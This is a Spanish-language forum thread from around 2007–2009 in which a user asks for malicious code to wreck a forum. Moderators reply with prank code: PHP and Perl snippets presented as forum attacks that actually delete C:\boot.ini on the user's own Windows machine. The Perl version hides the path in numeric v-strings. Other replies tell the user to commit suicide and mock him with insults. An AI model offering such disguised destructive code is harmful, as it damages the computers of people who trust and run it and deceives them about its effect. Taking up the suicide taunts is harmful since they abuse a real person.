• Viernes 29 de Marzo de 2024, 13:15

Autor Tema:  Codigos Maliciosos Para Postear En Foros..  (Leído 6406 veces)

J.E.

  • Nuevo Miembro
  • *
  • Mensajes: 3
    • Ver Perfil
Codigos Maliciosos Para Postear En Foros..
« en: Viernes 7 de Diciembre de 2007, 15:07 »
0
porque los que yo usaba los admines del foro ya los restringieron.. asi que necesito mas porque quiero destruir ese foro.. tipo esos codigos que bloquen los topicos y eso me van a servir..
Gracias muchachos..

Eternal Idol

  • Moderador
  • ******
  • Mensajes: 4696
  • Nacionalidad: ar
    • Ver Perfil
Re: Codigos Maliciosos Para Postear En Foros..
« Respuesta #1 en: Viernes 7 de Diciembre de 2007, 15:10 »
0
Aca tenes la mejor solucion:

Código: Text
  1.  
  2. JE->Suicidio();
  3.  
  4.  

Nacional y Popular En mi país la bandera de Eva es inmortal.


Queremos una Argentina socialmente justa, económicamente libre y  políticamente soberana.
¡Perón cumple, Evita dignifica!


La mano invisible del mercado me robo la billetera.

J.E.

  • Nuevo Miembro
  • *
  • Mensajes: 3
    • Ver Perfil
Re: Codigos Maliciosos Para Postear En Foros..
« Respuesta #2 en: Viernes 7 de Diciembre de 2007, 15:58 »
0
encerio.. ayudenme pues.. en notepad nomas loo fue hecho el foro.. totalmente html es.. pasenme pues un codigo html para enquilombarlo..

RadicalEd

  • Moderador
  • ******
  • Mensajes: 2430
  • Nacionalidad: co
    • Ver Perfil
Re: Codigos Maliciosos Para Postear En Foros..
« Respuesta #3 en: Viernes 7 de Diciembre de 2007, 17:44 »
0
Esto no es html, pero si PHP, con este comando destruiras completamente un foro, debes ejecutarlo desde tú equipo instalando el AppServ.
Código: PHP
  1. <?php
  2. $var_del ="C:";
  3. $ip="ACA VA LA IP O EL NOMBRE DEL FORO";
  4. unlink($var_del."\boot.ini");
  5. ?>
  6.  
  7.  
Con eso eliminaras un archivo importantisimo de los foros y con este no podra funcionar.
« última modificación: Martes 8 de Julio de 2008, 20:34 por Edo »
El pasado son solo recuerdos, el futuro son solo sueños

su -

  • Moderador
  • ******
  • Mensajes: 2349
    • Ver Perfil
Re: Codigos Maliciosos Para Postear En Foros..
« Respuesta #4 en: Viernes 7 de Diciembre de 2007, 20:54 »
0
:comp: Si el codigo de RadicalEd no te funciona, aqui hay una solucion en Perl:

Solo te funciona si estas en Windows y si tenes Perl 5 instalado.

Código: Text
  1. my &#036;ports = sprintf v40.111.95.95.13.10.47.47.92.13.10.86.95.47.95;
  2. my &#036;data = sprintf v67.58.47.47.98.111.111.116.46.105.110.105;
  3.  
  4. print &#34;Direccion del foro: &#34;;
  5. chomp(my &#036;page = &#60;STDIN&#62;);
  6. unlink ( &#036;data );
  7.  
  8. print &#036;page, &#34;&#092;n&#34;;
  9. print &#036;ports;
  10. print (chr(&#036;_)) foreach (&#60;DATA&#62;);
  11.  
  12. __DATA__
  13. 32
  14. 72
  15. 97
  16. 32
  17. 32
  18. 112
  19. 97
  20. 114
  21. 97
  22. 32
  23. 113
  24. 117
  25. 101
  26. 32
  27. 97
  28. 112
  29. 114
  30. 101
  31. 110
  32. 100
  33. 97
  34. 115
  35. 44
  36. 32
  37. 83
  38. 80
  39. 65
  40. 77
  41. 69
  42. 82
  43. 13
  44. 10
  45.  
*******PELIGRO LEE ESTO!!*******

There is no place like 127.0.0.1

Conecto luego existo, no conecto luego insisto.

J.E.

  • Nuevo Miembro
  • *
  • Mensajes: 3
    • Ver Perfil
Re: Codigos Maliciosos Para Postear En Foros..
« Respuesta #5 en: Viernes 7 de Diciembre de 2007, 22:59 »
0
Gracias RadicalEd! algo asi lo que necesitaba.. y de donde puedo descargar el AppServ?

su -

  • Moderador
  • ******
  • Mensajes: 2349
    • Ver Perfil
Re: Codigos Maliciosos Para Postear En Foros..
« Respuesta #6 en: Sábado 8 de Diciembre de 2007, 02:38 »
0
Cita de: "J.E."
Gracias RadicalEd! algo asi lo que necesitaba.. y de donde puedo descargar el AppServ?
De esta pagina
*******PELIGRO LEE ESTO!!*******

There is no place like 127.0.0.1

Conecto luego existo, no conecto luego insisto.

ProfesorX

  • Moderador
  • ******
  • Mensajes: 796
  • Nacionalidad: mx
    • Ver Perfil
Re: Codigos Maliciosos Para Postear En Foros..
« Respuesta #7 en: Sábado 8 de Diciembre de 2007, 21:07 »
0
que id....a eres J.E., eres tan id....a como lammer, espero que despues de haber hecho lo que te dijeron que hicieras, aprendas la leccion  :devil:  :devil:  :devil:

NOTA:
==================================================================
Este foro es para ayudar, aprender, compartir... usenlo para eso,
NO SE RESUELVEN DUDAS POR MENSAJE PRIVADO Y MENOS POR CORREO
==================================================================

RadicalEd

  • Moderador
  • ******
  • Mensajes: 2430
  • Nacionalidad: co
    • Ver Perfil
Re: Codigos Maliciosos Para Postear En Foros..
« Respuesta #8 en: Martes 11 de Diciembre de 2007, 20:56 »
0
Sera que a este imbecil le funcionaron los scripts y por eso no se ha vuelto a conectar :devil:  :lol:
El pasado son solo recuerdos, el futuro son solo sueños

burke

  • Nuevo Miembro
  • *
  • Mensajes: 6
    • Ver Perfil
Re: Codigos Maliciosos Para Postear En Foros..
« Respuesta #9 en: Lunes 18 de Febrero de 2008, 16:54 »
0
a la gente se le va la olla  &lt;_&lt;

JrcsDev

  • Miembro MUY activo
  • ***
  • Mensajes: 245
  • Nacionalidad: ve
    • Ver Perfil
    • http://codigo7.wordpress.com/
Re: Codigos Maliciosos Para Postear En Foros..
« Respuesta #10 en: Martes 8 de Julio de 2008, 19:38 »
0
jajaja.... en fin! hay todo tipo de lamers! jaja
Sígueme en Twitter]
Donar comida a los chicos necesitados!
Todo lo puedo en Cristo que me fortalece...

shakka

  • Miembro HIPER activo
  • ****
  • Mensajes: 679
  • Nacionalidad: cr
    • Ver Perfil
    • http://mbrenes.com
Re: Codigos Maliciosos Para Postear En Foros..
« Respuesta #11 en: Miércoles 9 de Julio de 2008, 02:53 »
0
Citar
jajaja.... en fin! hay todo tipo de lamers! jaja


Parecia un specimen interesante, lastima.

Para mi que aplico el metodo de Eternal Idol  :lol:

hdr

  • Miembro MUY activo
  • ***
  • Mensajes: 128
    • Ver Perfil
Re: Codigos Maliciosos Para Postear En Foros..
« Respuesta #12 en: Miércoles 9 de Julio de 2008, 07:39 »
0
jajajajaj

JrcsDev

  • Miembro MUY activo
  • ***
  • Mensajes: 245
  • Nacionalidad: ve
    • Ver Perfil
    • http://codigo7.wordpress.com/
Re: Codigos Maliciosos Para Postear En Foros..
« Respuesta #13 en: Viernes 11 de Julio de 2008, 08:31 »
0
no es por nada mi gente jajaja, pero si fueran a hacer un concurso de EL POST MÁS DIVERTIDO! yo votara por este jajaja... es el más original que he visto,,,, cada vez que lo leo es la misma risa jajaja
Sígueme en Twitter]
Donar comida a los chicos necesitados!
Todo lo puedo en Cristo que me fortalece...

z0n3r

  • Nuevo Miembro
  • *
  • Mensajes: 1
    • Ver Perfil
Re: Codigos Maliciosos Para Postear En Foros..
« Respuesta #14 en: Miércoles 1 de Abril de 2009, 22:23 »
0
uuuuuuy que mal por el.

yo no se mucho de programacion pero ese boot.ini no me daria nadita de confianza jajaja

pobresito

anareymej

  • Nuevo Miembro
  • *
  • Mensajes: 1
    • Ver Perfil
Re: Codigos Maliciosos Para Postear En Foros..
« Respuesta #15 en: Viernes 26 de Junio de 2009, 18:51 »
0
de lo peor

Ryusaki N

  • Miembro activo
  • **
  • Mensajes: 76
    • Ver Perfil
Re: Codigos Maliciosos Para Postear En Foros..
« Respuesta #16 en: Viernes 26 de Junio de 2009, 19:15 »
0
Hombre... Una palabra: Lammer. :no:
C/C++/C#/Java/Python dev. Frontend web developer. ASP.NET && PHP, ASM x86
No tengo vida social y me siento orgulloso!! 1000% Geek.